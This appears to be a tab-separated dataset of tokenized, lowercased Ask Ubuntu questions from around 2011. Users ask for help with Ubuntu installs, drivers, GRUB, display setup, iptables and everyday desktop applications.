88694	ca n't install 11.10 desktop 64-bit	i am trying to install 11.10 desktop 64bit on a brand new ssd with no existing operating system . i downloaded it from the ubuntu site , i used roxio to burn image to cd , and booted from the cd . i do n't get the option to install or try . instead all i get is an error not a com 32r image with a boot prompt . this message repeats . i tried typing help at this prompt . a help menu displays , but then it freezes and i am unable to press any of the f2 to f12 keys . i tried typing live at the prompt and it just sets there . has anyone else experienced this issue ?
88696	how to edit the messaging menu ?	i want to remove the evolution group and replace it with thunderbird , remove chat and replace it with pidgin , and finally remove the broadcast group . how do i do that ?
88697	storing and reading pdf files on live cd	i want to boot from live cd and use it without installing it . all i want to do is connect to the internet and read couple of pdf and word documents . is it possible to write specific pdf files i want to read to live cd ? i mean , after i boot of live cd i should be able to see pdf files . i do n't want them saved to my hard disk on computer . i want to have all documents i want on live cd itself . is this possible ?
88700	how do i get a samsung scx3200 multifunction printer/scanner working ?	i bought samsung scx3200 multifunction printer i think that printing is easy as ubuntu define the printer by default but what about scanning i have found a default installed program called simple scan but it did n't recognize the scanner and i have installed the driver from here but the same then what to do ? ? ?
88704	`` failed to unmount partitions '' during installation ubuntu 11.10	i have multi-boot with windows 7 , linux mint , kubuntu and then i was installing ubuntu 11.10 too but during the installation it appears this message : failed to unmount partitions . migration-assistant needs to mount a partition but can not do so because the following mount point could not be unmounted : /dev/sda6 . please close any applications using these mount points ... what can i do ?
88705	terminator : single window , focus on launch	i am configuring terminator for my desktop . i use the ctrl + alt + t shortcut to launch it . since i want only a single instance running , i use run-one terminator as the launcher command . now if an terminator instance is running , a new instance isn`t launched , but the existing instance does not get focused . any ideas as to how i could get the terminator window to get focus ?
88706	executing bash script for all users	i have setup-ed key based ssh authentication to all my hosts for root user . however , for example if i want to change the background of all the users ( not the root user , different user account ) how to change it . is it possible to change the user while running the script ? so that i will be able to change the wallpapers of all clients in different user account .
88710	how can i get the menu bar in firefox ?	i installed a fresh ubuntu desktop 11.10 and in firefox there is no menu bar . i tried several things like pressing the alt key f1-12 right click on a free space in the tab bar but still no menu bar visible in firefox .
88711	thunderbird account settings will not save	i have just recently installed 11.10 alongside windows 7 on 2 computers and a wubi install on one computer . all three are newer model toshibas . on two of them thunderbird will not save account settings . i found this out by trying to reply to an email and the reply message appears at the bottom of the quote instead of the top . i tried to go into the composition and addressing to have the reply at the top of the quote but it will not hold . then i tried changing other settings but to no avail . are there any fixes for this ?
88712	how do i backup ssh keys ?	i am planning to do a fresh install of ubuntu 11.10 in my system . before that i have setuped key based ssh authentication in this machine . is it possible to take backup of those ssh keys , so that i can use that in my new installation . or else i must setup keybased ssh authentication again ? if i can take backup , what are the files i need to copy ? can someone explain it in detail pls . thanks in advance .
88718	how to get glibcxx_3.4.14 ?	i am trying to use synergy and when i run synergyc or synergys it shows the error : synergys : /usr/lib/libstdc++.so.6 : version `glibcxx_3.4.14 ' not found ( required by synergys ) i do n't have that version as shown by this command : strings /usr/lib/libstdc++.so.6 | grep glibc glibcxx_3.4 glibcxx_3.4.1 glibcxx_3.4.2 glibcxx_3.4.3 glibcxx_3.4.4 glibcxx_3.4.5 glibcxx_3.4.6 glibcxx_3.4.7 glibcxx_3.4.8 glibcxx_3.4.9 glibcxx_3.4.10 glibcxx_3.4.11 glibcxx_3.4.12 glibcxx_3.4.13 glibc_2.0 glibc_2.3 glibc_2.4 glibc_2.1 glibc_2.3.4 glibc_2.1.3 glibc_2.3.2 glibc_2.2 glibcxx_force_new glibcxx_debug_message_length how can i get glibcxx3.4.14 ? i tried apt-get install libstdc++6-4.4-dbg libstdc++6-4.4-dev , but that wont install that version .
88719	the repositories for 10.04 will stop working in april 2012 , but i can still use 10.04 ?	i just bought an emachines t5048 for $ 60 . turns out newer kernels wo n't boot on this machine , no matter what options are used . ( the pc is from late 2006 , ati radon xpress 200 chipset ) i know the ubuntu repositories for 10.04 will stop working . come 12.04 , how will i be installing software on this pc ? any other gotchas ?
88723	libreoffice calc loses maximize , minimize , close , and file name	i have installed 11.10 on 3 toshiba computers . libreoffice calc loses maximize , minimize , close , and file name at the top left corner when i open an existing file on all three computers . sometimes it shows file , edit , view , go , bookmarks and help with no buttons above the drop down menus for calc . i have had it happen in writer as well . if i open a new calc document from the launcher and then use the drop down menu to locate an existing file i get all of the buttons and file name . are there any fixes ?
88724	why does lubuntu automatically reset my cpu into performance mode after a short time ?	if i put the cpu mode into powersave or ondemand , it works for some time ( 5-10 minutes ) but after that time lubuntu automatically sets the cpu to performance mode . ( i see it doing sudo cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor ) any ideas to prevent that ?
88731	can the update manager download only a single package at a time ?	i need the update manager to only download a single package at a time and not try to download multiple packages at once . my slow internet can not handle multiple connections ; slows the download to a crawl and some packages will reset themselves halfway through when they time-out . edit when using apt-get update multiple repositories get checked : when using apt-get upgrade multiple packages are downloaded :
88736	can not enable my graphic card ( ati radeon hd 3200 graphics )	i 'm new to ubuntu . i hve update all my driver after installation and all of the driver was enable except for the graphic driver . i 'm using compaq presario cq40 . here are the details : *-display description : vga compatible controller product : rs780m/rs780mn [ radeon hd 3200 graphics ] vendor : ati technologies inc physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:18 memory : c0000000-cfffffff ioport:7000 ( size=256 ) when i open additional drivers and try to enable the driver it say : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i need a help .
88743	is there any adobe illustrator-like software in ubuntu ?	is there any graphic designing software for free in ubuntu ?
88746	connecting to an ms sql database and using libreoffice as the frontend	i am looking to upgrade my company computers at work to ubuntu from windows xp , however we have a bespoke ms access program that connects to our ms sql server in the usa . is there away to connect using freetds and writing the bespoke program in libreoffice base . if so how would i connect this . detailed instructions would be nice . many thanks .
88750	how to completely uninstall sun java	i have followed a tutorial on how to install sun jdk manually on ubuntu 11.10 , alright it worked . but now i want to remove it , because i want to install the 32bit version instead of the 64 ( what i did ) , can anyone help me . the tutorial i did : http : //www.printandweb.ca/2011/12/install-oracle-jdk-6-for-ubuntu-1110.html sorry for my english
88754	upnp / dlna ( client ) player recommendations ?	since neither vlc stable / vlc nightly builds / totem with coherence plugin work properly in oneiric i 'm searching for an alternative to watch media streamed from my seagate dockstar using minidlna as a server . the only client that works is xbmc , but that 's much of an overkill and stops me from doing other tasks . atm i 'm working around this with samba shares , but it baffles me that both a playstation 3 and windows 7 laptop work better together with my debian based media server than my linux desktop in this regard .
88756	unable to choose between speakers and headphones	everyone.. my pc has two audio 3.5mm audio outputs : back - used for speaker system & front - used for headset i want to know whether is there something in ubuntu 11.04 that makes it possible to switch between speakers and headphones as and when required.i mean , avoiding audio playing out of both simultaneously and only out 1 of these 2 . after some googling , i did the following i.i installed padevchooser but could not configure it do so . ii.also installed sudo apt-get install gnome-media but still no difference was seen . but after these steps , i connected my headphones and lessened the speakers volume and to my surprise , only the headphones were playing audio but the speakers did play audio along with the headphones if the volume was restored back to normal . has my problem been solved and if not , then whats the way to go about it ?
88760	how do i install clang version 3 in 10.10 ?	how would i go about installing version 3 of clang/llvm in ubuntu 10.10 ? ubuntu 10.10 installs version 2.8 by default . version 3 has more extensive/up to date support for c++ and possibly c ( i am not totally sure about c ) . i know that i could possibly compile from source but was wondering if there is a ppa or other method to avoid compiling it from source . if i compile from source do i have to tell it where to find the std c library etc . or is that automatically done .
88762	scripts in crontab do n't get executed at all	i did something as simple as this : crontab -e * * * * * touch /home/alexis/hi.txt crontab : installing new crontab but it does n't work at all ; not mentioning more complicated scripts . any idea what went wrong ?
88763	remove all cookies except for app/pinned tabs	is there a way to remove all cookies , on shutdown , of any websites not pinned ? manually adding websites to the exception list is n't straightforward since some websites saves multiple cookies from different domains . i 'm looking for a solution for either chrome/chromium or firefox .
88765	how do i set the permissions for newly created files ?	i have setup apache and php and i work in /var/www so i 've changed the permission of this folder owning it from my user and giving all others users read-only access . but when i create new files using right click- > create document they get created with `` no rights '' for others users and also for my group while the folder permission are to giv read-only to all users . how can i solve ? this is the output of ls -la /var/www matteo @ matteo-stable : ~ $ ls -la /var/www totale 24 drwxrwsr-x 5 matteo matteo 4096 2011-12-17 13:55 . drwxr-xr-x 18 root root 4096 2011-12-17 14:03 .. drwxrwsr-x 5 matteo matteo 4096 2011-12-18 19:34 cloudnotesci drwxrwsr-x 6 matteo matteo 4096 2011-12-11 19:52 cloudnoteslayout -rw-rw-r -- 1 matteo matteo 25 2011-12-11 20:26 info.php drwxrwsr-x 7 matteo matteo 4096 2011-12-17 13:55 oldp
88768	no sound with hdmi on an acer aspire revo 3700	new to ubuntu 11.10 just installed on acer aspire revo 3700 . i dont get any sound through the hdmi cable . any suggestions please ?
88769	ubuntu wo n't install ends up in shell	just downloaded ubuntu and made a bootable cd on a pc using xp . cd then put into a pc that has no os on it ( used to be vista , but got rid of that with xp ... ..xp runs ok , but have now removed it because it is the cd for the other pc ) cd spins up , appears to be going into boot , but as it runs through the normal process it gets me to what appeasr to be a shell command line and a drive . the floppy ( a ) is disabled and the bios is set to boot from cd . bios is set to boot from cd ( d or e ) , and floppy ( a ) is disabled . pc is a small iqon heap but relatively unused . sata hdd configured to ide . intel cpu approx 2.8ghz ... ..ca n't tell you much more because i ca n't get into it ! gigabyte mobo supports xp & vista . f12 for the boot menu , but oddly it stays stuck at the hdd setting . however in the main bios , it is set to boot for cd and it is obviously spinning up the cd and i assume reading it because of what i see on screen , including caldera dr dos 7.03 , which i have n't seen prior to trying to load ubuntu . in the main bios there is a priority setting for the hdd which does appear to want to change unless i change it to 'bootable add-in cards ' . there is also a boot agent configuration menu on which i could change four values , but to what i do n't know . at this very moment i have the mobo manual open and have set the optimized defaults , plus have checked the 'boot from ' settings again so that they are cd . the boot configuration section is n't in the manual ( great ) ... however , the ubuntu disc did nothing when inserted in the main pc , just shows a windows type of data file icon , with the .iso file name . i wonder if it is because i have used a cd-rw ? ? ? used nero for the cd . have tried cd-r and cd-rw . have just tried iso recorder as well , but that failed with an 'error ' message . so i have deleted the ubuntu file and am downloading again ... will try infra recorder this time . what have i done wrong ?
88772	is there a simple , plaintext , lightweight hosted web-based text editor ?	i want to host it on my own ubuntu server , access it from outside within my browser and be able to edit my notes in it and it will save . i also want to be able to access it from a smartphone 's web browser and make edits to my notes . anything like this available ?
88777	deja backup to amazon s3 text-only possible ?	i have an old laptop which a defect graphics card so that i can run only ubuntu text only . is it possible to run deja backup from command line to backup to amazons s3 ? thanks a lot
88783	why does chromium crash within seconds of starting ?	when i start chromium the program just disappears shortly after the tabs have loaded . i have a fresh install of ubuntu 11.10 that i installed it using the wubi installer . chromium worked fine when i first installed it . things i can remember doing before it stopped : i installed 200+ ubuntu updates i synced chrome with my google account ( bookmarks etc ) installed and removed eclipse i have tried un-installing and re-installing chromium but the problem persists . where can i look to diagnose the cause of the crashing ? update - here 's what the console spits out : matt @ ubuntu : ~ $ chromium-browser ( chromium-browser:2023 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( chromium-browser:2023 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( chromium-browser:2023 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( chromium-browser:2023 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , [ 2023:2023:1515592300 : error : browser_main.cc ( 96 ) ] gtk : gtk_widget_size_allocate ( ) : attempt to allocate widget with width -2147483648 and height 1026 chromium-browser : /build/buildd/cairo-1.10.2/src/cairo-surface.c:1287 : cairo_surface_set_device_offset : assertion `status == cairo_status_success ' failed . aborted matt @ ubuntu : ~ $
88790	is there a way of automatically suspending processes that are running in unfocused workspaces ?	is there a task manager ( or an option ) that can automatically suspend processes ( or slow them down ) in unused workspaces ? for example i have chromium in one workspace and it takes quite a lot of cpu power because i have a lot of tags . i want to do something else in another workspace and i do n't want chromium to slow me down . how can i suspend it automatically ?
88797	how to create an installation package with all the updates ?	how do i create an installable usb image with all the current updates ?
88798	how do i merge two virtual hard disks ?	i am using ubuntu on a virtual machine of disk size of 8 gbs and i was trying to compile kernel to build a module following these steps . sudo apt-get install build-essential linux-source cd /usr/src sudo tar xjvf linux-source-2.6.22.tar.bz2 cd linux-source-2.6.22 sudo cp /boot/config-2.6.22-14-generic .config sudo make sudo make modules but it crashed due to lack of space so i added another virtual hard disk of 8 gbs and i do n't know what to do next . i need to do the same exact steps and i am not sure if compiling should be in /usr/src but if so i want to merge the extra space from the extra hard disk into this location . is that possible ? in other words , i need to connect the two hard disks .
88803	how to optimize ubuntu to watch 1080p movies in mplayer	i have copy of stargate in full hd weighing in at about 10.7 gb . here is the full file info when opened in mplayer mplayer : symbol `ff_codec_bmp_tags ' has different size in shared object , consider re-linking mplayer svn-r33713-4.6.1 ( c ) 2000-2011 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing stargate.mkv . libavformat file format detected . [ matroska , webm @ 0x9c6c2e0 ] max_analyze_duration reached [ matroska , webm @ 0x9c6c2e0 ] estimating duration from bitrate , this may be inaccurate [ lavf ] stream 0 : video ( h264 ) , -vid 0 [ lavf ] stream 1 : audio ( dca ) , -aid 0 , -alang eng , 3/2+1 [ lavf ] stream 2 : subtitle ( pgssub ) , -sid 0 , -slang eng [ lavf ] stream 3 : subtitle ( pgssub ) , -sid 1 , -slang spa [ lavf ] stream 4 : subtitle ( pgssub ) , -sid 2 , -slang eng video : [ h264 ] 1920x816 0bpp 23.976 fps 0.0 kbps ( 0.0 kbyte/s ) load subtitles in ./ open : no such file or directory [ mga ] could n't open : /dev/mga_vid open : no such file or directory [ mga ] could n't open : /dev/mga_vid [ vo_tdfxfb ] ca n't open /dev/fb0 : permission denied . [ vo_3dfx ] unable to open /dev/3dfx . failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory [ vdpau ] error when calling vdp_device_create_x11 : 1 ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family selected video codec : [ ffh264 ] vfm : ffmpeg ( ffmpeg h.264 ) ========================================================================== ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 48000 hz , 2 ch , s16le , 1536.0 kbit/100.00 % ( ratio : 192000- > 192000 ) selected audio codec : [ ffdca ] afm : ffmpeg ( ffmpeg dts ) ========================================================================== ao : [ pulse ] 48000hz 2ch s16le ( 2 bytes per sample ) starting playback ... unsupported pixelformat 61 unsupported pixelformat 53 movie-aspect is 2.35:1 - prescaling to correct movie aspect . vo : [ xv ] 1920x816 = > 1920x816 planar yv12 a : 15.8 v : 15.8 a-v : -0.002 ct : 0.039 0/ 0 41 % 2 % 2.0 % 2 0 i 've noticed the video is a little choppy , as if a few of the frames are displayed at the correct frame rate , then a subsequent one pauses for a moment . this is most apparent in scenes where there is a slow consistent movement ( if the movement is erratic , or the scene is hectic , it is hard to tell ) . when i open my system monitor , mplayer is only using 50 % of my cpu and my total cpu usage never exceeds 80 % . likewise , mplayer only uses 40 mb of memory , and total memory usage never exceeds 60 % . this leads me to believe that my system is not the bottle neck here , but the mkv file . is there a more definitive way for me to determine what is truly acting as the bottle neck ? furthermore , is there a way to turn on hardware acceleration and/or determine if hardware acceleration is enabled ? if i could toggle this feature on/off , and the choppy playback disappears , then that will have answered my question . system specs : os : ubuntu oneiric 11.10 cpu : amd phenom ii x4 970 black edition am3 cpu gpu : radeon hd 4670 ram : 4 gb ddr3
88804	gnupginterface poblem while upgrading hardy to lucid	i have an old version of hardy 8.04.4 lts ubuntu-server and i wanted to upgrade it to lucid 10.04 i did exactly as in `` upgrade from 8.04 lts to 10.04 lts '' paragraph of this page : https : //help.ubuntu.com/community/lucidupgrades then i tried sudo do-release-upgrade then i got this traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 8 , in < module > from updatemanager.core.distupgradefetchercore import distupgradefetchercore file `` /usr/lib/python2.5/site-packages/updatemanager/core/distupgradefetchercore.py '' , line 34 , in < module > import gnupginterface importerror : no module named gnupginterface then i made this sudo aptitude reinstall python-gnupginterface now i got this leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox nautilus recommends gnome-app-install score is 4839 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox xsane-common recommends xsane nautilus recommends gnome-app-install score is 4640 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer xsane-common recommends xsane firefox recommends ubufox nautilus recommends gnome-app-install score is 4600 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox xsane-common recommends xsane nautilus recommends gnome-app-install score is 4570 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox nautilus recommends gnome-app-install score is 4799 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox xsane-common recommends xsane nautilus recommends gnome-app-install score is 4600 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer xsane-common recommends xsane firefox recommends ubufox nautilus recommends gnome-app-install score is 4560 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox xsane-common recommends xsane nautilus recommends gnome-app-install score is 4530 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox nautilus recommends gnome-app-install hplip-data recommends hplip score is 4629 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox xsane-common recommends xsane nautilus recommends gnome-app-install hplip-data recommends hplip score is 4430 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer xsane-common recommends xsane firefox recommends ubufox nautilus recommends gnome-app-install hplip-data recommends hplip score is 4390 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox xsane-common recommends xsane nautilus recommends gnome-app-install hplip-data recommends hplip score is 4360 accept this solution ? [ y/n/q/ ? ] n leave the following dependencies unresolved : openoffice.org-hyphenation-pl recommends openoffice.org ( > = 1.0.3 ) | openoffice.org-writer firefox recommends ubufox nautilus recommends gnome-app-install score is 4538 accept this solution ? [ y/n/q/ ? ] n which corresponding score should i choose more about this here : http : //ubuntuforums.org/showthread.php ? p=11547543
88806	how to install into existing lvm logical volumes	i have a debian squeeze install , and i 'd like to switch to ubuntu 11.10 . in my current setup , i have 2 hdds , the first 250gb and the second 500gb . the 250gb drive just has a ntfs partition with win7 on it . the 500gb drive has 397gb of ntfs , 1gb ext3 which i 'm using as the /boot partition , and the rest in an extended partiton contaning an lvm2 partition which is the only physical vomume in my lvm volume group . logical volumes are as follows : home - 46gb , mount point /home rd - 18.62gb , mount point / swap - 2.79gb i 'd like to install ubuntu into the existing boot partition and rd logical volume . the installed does n't seem to understand lvm . how do i do this ?
88809	how do i get rid of the groups in the contact list in empathy ?	i do n't want to see the groups at all in empathy . instead i just want to see a flat list of contacts just like i can in adium . is this possible ?
88810	iptables rule for server accessed remotely via dhcp	sorry to ask this question - but i have been browsing forums and threads on this subject and seem to confuse myself more than actually getting any clarity . all i need is a short and concise answer for this problem : how do a setup a ( chain ) rule in iptables which rejects any source which fails to gain access to the server after xx attempts within yy minutes , so that any further attempt to contact the server is rejected before password is being matched for zz minutes . after zz minutes after the last attempt to connect , the rule must allow the same source to retry its attempt as if it had never attempted to reconnect before . i assume this has to be written as a new chain rule . i assume the chain rule has to be saved to iptables , so that the rule is resumed at reboot . i assume the chain rule needs some kind of logging . my problem is that i do n't understand the iptables syntax disregarding how much i study it , and hence i 'm grateful for the shortest `` script type '' answer on this question
88814	how to run javascript/html page	i want to know what is the terminal command for compiling and executing javascript/html . is it the same as that of compilation of c program or is it different ?
88819	how can i run a command conditionally ?	when running cat /sys/block/sda/queue/scheduler an example answer is the line noop anticipatory deadline [ cfq ] i want to write a script such that if the cat line answer contains deadline then do x ; or if deadline does n't appear , but it contains noop then do y so , how can i write a script that : checks the cat answer in case of deadline does : sudo sed -i 's/^exit 0 $ /\necho deadline > \/sys\/block\/sda\/queue\/scheduler\necho 1 > \/sys\/block\/sda\/queue\/iosched\/fifo_batch\nexit 0/ ' /etc/rc.local if deadline does n't exist but 'noop ' does then do : sudo sed -i 's/^exit 0 $ /\necho noop > \/sys\/block\/sda\/queue\/scheduler\nexit 0/ ' /etc/rc.local else nothing .
88820	ubuntu one magicicada for windows ?	is there a similar tool like magicicada for windows 7 ?
88823	help with graphics card - geforce 9500	bad quality video on internet ! i 've installed ubuntu 11.10 on my machine that is an amd athlon x2 5000+ 4 gb ddr3 geforce 9500 gt/pci/sse2 when i play some video on internet , like you-tube , in 480 or higher , in full-screen mode the quality is so low ... the same problem i get with the effects on my desktop i tried all the driver shown in the list of available drivers but none of them solves my issue ! the one that works fine is current-version one ! ! !
88824	how to make ubuntu one sync existing files and folders inside a shared folder	i have shared my documents folder with ubuntu one . it has the big green tick and any new files or folders i create in there get synced . but i want all the existing files in there to sync as well . how do i enable that ?
88829	display private/protected attributes in umbrello uml modeler	using umbrello version 2.7.4 , when creating a new class , private/protected attributes are not shown in class diagram view while public are shown . i have verified that show attributes option is checked . is this a known bug ? how it could be fixed ? problem seems to exists since 2.4.4 : http : //lists.opensuse.org/archive/opensuse/2010-12/msg00011.html private/protected attributes should be present with a minus/tilde sign at the start of the line .
88830	grub points to recovery partition instead of install partition	i just setup a dual boot system but there is a slight problem . the win7 grub entry points to the recovery partition instead of the partition where the install resides . it currently points to /dev/sda3/ instead of /dev/sda4/ . moreover i tried to edit the boot parameters in grub but i think there is more to it . i am not sure if mbr needs some fix too because i get a bsod just after i boot , even after i changed it to /dev/sda4/ but there was some entry like hd0 too , so that could be wrong . how to go about changing the grub entry ?
88833	automatially detect external monitor with right resolution ?	i am using a external tft monitor with 1024x768 screen resolution together with my primary laptop monitor at 1366x768 on a intel hd 3000 card . after setting monitor display in the display dialog , i can correctly expand my desktop to the 2nd monitor . but always after restart , the computer loads with the resolution of the tft but only on the laptop monitor . how can i make the system automatically detect the all monitors and then use them with adequate resolution right after boot ? thanks for any hints .
88837	why is n't fglrx using the full area of one of the two monitors ?	i switched from the default driver to fglrx recently so a certain app would stop crashing . after a while i got my dual monitor system to work , except the right monitor ( acer ) shows the whole desktop shunken about 90 % . there 's an unused margin of an inch or so all around . both monitors are 23 '' , identical for functional purposes but different brands . both are displaying at 1920x1080 and show the entire desktop . left monitor , which shows the whole desktop raster filling the physical lcd area , is an aoc plugged in by dvi . the right monitor is an acer plugged in by hdmi . it 's not possible right now to wrestle these around to see the labels on back ; exact models unknown . both are plugged into an ati radeon hd 5450 . catalyst control center says it 's version 2.13 , catalyst version 11.8 . using xubuntu 11.10 , maybe a week or two not up to date . using xfce , but tried kde and unity to see if that mattered . nope , except unity made the right monitor all back except for the cursor .
88841	how do i know if i changed a setting in winetricks	right now with the wine 1.3.35 i do not know if i have a setting activated or not , for example : here you see an image of the `` change settings '' option in winetricks but they do not appeared marked or at least stay marked after i have checked them . how do i know which settings are activated and which are not . in the past i could do this in the sound tab for example when i wanted to emulate sound , full sound , alsa , oss or pulseaudio . since the options are now gone and only found in winetricks i check them but they do not stay activated or shown after closing winetricks . i may be closing winetricks wrong or maybe there is another option somewhere to `` save changes '' but what i normally do is : open winetricks select default wineprefix select change settings activate the settings i want and press the ok button if i go back to the change settings option they do not appear marked . looks like nothing was done .
88842	why do i get these strange errors when running php scripts ?	i installed php and the sqlite extension using : sudo apt-get install php5-cli php5-sqlite however , each time php starts up , i get the message : php warning : php startup : unable to load dynamic library '/usr/lib/php5/20090626/sqlite.so ' - /usr/lib/php5/20090626/sqlite.so : can not open shared object file : no such file or directory in unknown on line 0
88844	broken gnome shell theme	after some updates my gnome-shell theme is broken ( looks like old gnome2 ) . i tried many things : uinstalled alls gnome-shell extensions uninstalled and again installed gnome-shell as well uinstalled gnome-tweak-tool removed ~/.themes directory removed ~/.config/dconf installed lxappearance removed gnome-accessibility-themes and then installed gnome-themes-standard nothing helped and right now i 'm loosing my mind some info : system info - > graphics shows : `` experience fallback '' gnome-shell -- replace xlib : extension `` glx '' missing on display `` :0 '' . ( gnome-shell:7853 ) : clutter-critical ** : unable to initialize clutter : the opengl version could not be determined window manager error : unable to initialize clutter . other command gnome-shell xlib : extension `` glx '' missing on display `` :0 '' . ( gnome-shell:7855 ) : clutter-critical ** : unable to initialize clutter : the opengl version could not be determined window manager error : unable to initialize clutter .
88845	mounting windows share with non-root users ?	i 'm having some trouble mounting shares on 11.10 . i 've installed pyneighborhood through which i can mount windows shares as root . i want to be able to mount them as non-root so that i can write to the shares . i did some googling and tried a few things , but none of it helped : sudo chmod 6755 /sbin/mount.cifs sudo chmod 6755 /bin/umount sudo chmod u+s /sbin/mount.cifs sudo chmod u+s /bin/umount any ideas ? mounting gives this error : mount.cifs : permission denied : no match for /home/myuser/pyneighborhood/workgroup/myserver/myshare found in /etc/fstab
88847	how do i enable vdpau hardware video acceleration support for non nvidia cards ?	i 've read about vdpau and how it enables mplayer to have hardware acceleration . but i also read that it 's only for nvidia cards how can i enable it on a non nvidia card ( mine it 's a amd but i would like to enable this in an intel netbook too ) ? and will this work for other video players ?
88848	how do i make sure that i have received a fix for a bug ?	the symptoms of my computer crashing was very similar to those reported in the comments section of a particular bug in an application that i download and get updates via a ppa . recently , the ppa 's bug page showed that the bug has been fixed-released , but very little information was given about the fix . how can i find out exactly - what did they actually do to fix the bug when was it released how can i be 100 % sure that i have received the update ( for example , is there an update history in ubuntu that will tell me that this particular update was downloaded and installed , with a reference to that particular bug ? )
88850	gnome shell freezes up ubuntu 11.10	so basically , i 'm trying to get ubuntu all set up , it installs no problem and works just fine . but i have a problem when it comes to using gnome shell . for some reason , every time i install gnome shell it messes everything up , i 'll install it , and it 'll run fine for about 5 minutes then everything freezes and i have to force shut down the computer . and it 's not a problem of using just gnome shell , if i install gnome shell , i ca n't even use unity without the system crashing . i have to re-install ubuntu all over again just so everything will work ( i 've re-installed 3 times now ) so , right now i do n't have gnome shell installed , but i was just kind of wondering why it does this and if there is something that i can do to fix it ? if not , that 's okay , unity is cool.. but i 'd prefer to run gnome . i 'm on a mac , dualbooting with osx .
88854	firmware missing for broadcom 802.11b/g adapter ?	i have a hp pavilion zx5280us laptop ( it says hp pavilion zx5000 on the physical laptop but it 's really an hp pavilion zx5280us when detected on the hp website ) and i installed ubuntu 11.10 alongside windows xp professional x86 . i tried to use a wireless connection but it said `` device not ready ( firmware missing ) '' . any help on this ? here 's the code output : 00:14.4 pci bridge [ 0604 ] : ati technologies inc ixp200 3com 3c920b ethernet controller [ 1002:4342 ] 00:14.5 multimedia audio controller [ 0401 ] : ati technologies inc ixp150 ac'97 audio controller [ 1002:4341 ] subsystem : hewlett-packard company device [ 103c:006b ] -- 02:02.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 03 ) subsystem : hewlett-packard company broadcom 802.11b/g wlan [ 103c:12f4 ] kernel driver in use : b43-pci-bridge -- 02:03.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) subsystem : hewlett-packard company device [ 103c:006b ] kernel driver in use : 8139too
88855	adding y-ppa manager	i was wondering if there was any way to add the app called y-ppa managaer to ubuntu ? y-ppa @ launchpad.net
88858	how to only have one display ?	i have a laptop that is hooked up to a monitor via a vga cable . i 'm trying to get the display set to the external monitor only ( i do n't want any display on the laptop screen ) . however , whenever i set the laptop display to `` off '' in the `` displays '' setting , their is n't a display on either ( the laptop screen and the monitor have no signal ) . so , how do i get it to where the display only shows up on the external monitor ?
88859	why wo n't the grub menu appear after a fresh server install ?	i recently applied a fresh install of 11.10 server , and when the grub menu should appear on boot , my monitor says it does n't support the current input timing . this is an lcd monitor , and i get a similar error on an older lcd monitor . here are the uncommented lines in my /etc/default/grub : grub_default=0 grub_hidden_timout=1 # changed to try getting the menu to appear grub_hidden_timeout_quiet=false # same grub_timeout=10 # changed from 2 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' '' after making the changes above , i ran update-grub which said it worked . my motherboard is an asrock n68-s board with geforce 7025 / nforce 630a chipset . if i do n't press anything during this time , the kernel will boot and i 'll get to a login prompt , however it 's a problem because it hangs at this point once i get mdadm installed and my raid drives connected . if i could see what 's going on maybe it will help me diagnose that problem . i have the exact same problem with a fresh install of 11.10 desktop ; the login and desktop ui work fine , it 's just when the grub menu should show up that i get nothing .
